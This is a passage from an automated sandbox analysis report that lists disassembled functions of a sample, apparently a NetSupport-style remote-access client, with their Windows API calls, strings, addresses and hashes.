                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                      • String ID: %s%s.bin$405464$clientinv.cpp$m_pDoInv == NULL
                                                                                      • API String ID: 4180936305-1502302367
                                                                                      • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                      • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                      • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                      • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                      Function 11144670 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                      • __strdup.LIBCMT ref: 111446A7
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                        • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                      • _free.LIBCMT ref: 111446DC
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                      • String ID:
                                                                                      • API String ID: 398584587-0
                                                                                      • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                      • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                      • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                      • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                      Function 1100ED70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                        • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                      • _free.LIBCMT ref: 1100EDB4
                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                      • _free.LIBCMT ref: 1100EDC7
                                                                                      • _free.LIBCMT ref: 1100EDDA
                                                                                      • _free.LIBCMT ref: 1100EDED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                      • String ID:
                                                                                      • API String ID: 3515823920-0
                                                                                      • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                      • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                      • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                      • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                      Function 11145910 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                        • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                        • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                      • wsprintfA.USER32 ref: 1114593E
                                                                                      • wsprintfA.USER32 ref: 11145954
                                                                                        • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                        • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                        • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                      • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                      • API String ID: 3779116287-2600120591
                                                                                      • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                      • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                      • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                      • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                      Function 11143230 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                      • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile$CloseHandle
                                                                                      • String ID: "
                                                                                      • API String ID: 1443461169-123907689
                                                                                      • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                      • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                      • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                      • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                      Function 1102D0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,4012B9B4,74DF2EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                      • String ID: Client$DisableGeolocation
                                                                                      • API String ID: 3315423714-4166767992
                                                                                      • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                      • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                      • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                      • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                      Function 110271B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                        • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                        • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                        • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                        • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                      • TranslateMessage.USER32(?), ref: 110271F0
                                                                                      • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                      • String ID: Exit Msgloop, quit=%d
                                                                                      • API String ID: 3212272093-2210386016
                                                                                      • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                      • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                      • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                      • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                      Function 110173F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 110173FD
                                                                                        • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101733C
                                                                                        • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                        • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                        • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                        • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017252
                                                                                        • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                        • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                        • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                      • SetEvent.KERNEL32(0000031C), ref: 1101741D
                                                                                      • GetTickCount.KERNEL32 ref: 11017423
                                                                                      Strings
                                                                                      • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                      • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                      • API String ID: 3804766296-4122679463
                                                                                      • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                      • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                      • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                      • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                      Function 111377F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                      • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleThread__wcstoi64
                                                                                      • String ID: *AutoICFConfig$Client
                                                                                      • API String ID: 3257255551-59951473
                                                                                      • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                      • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                      • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                      • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                      Function 11070C60 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
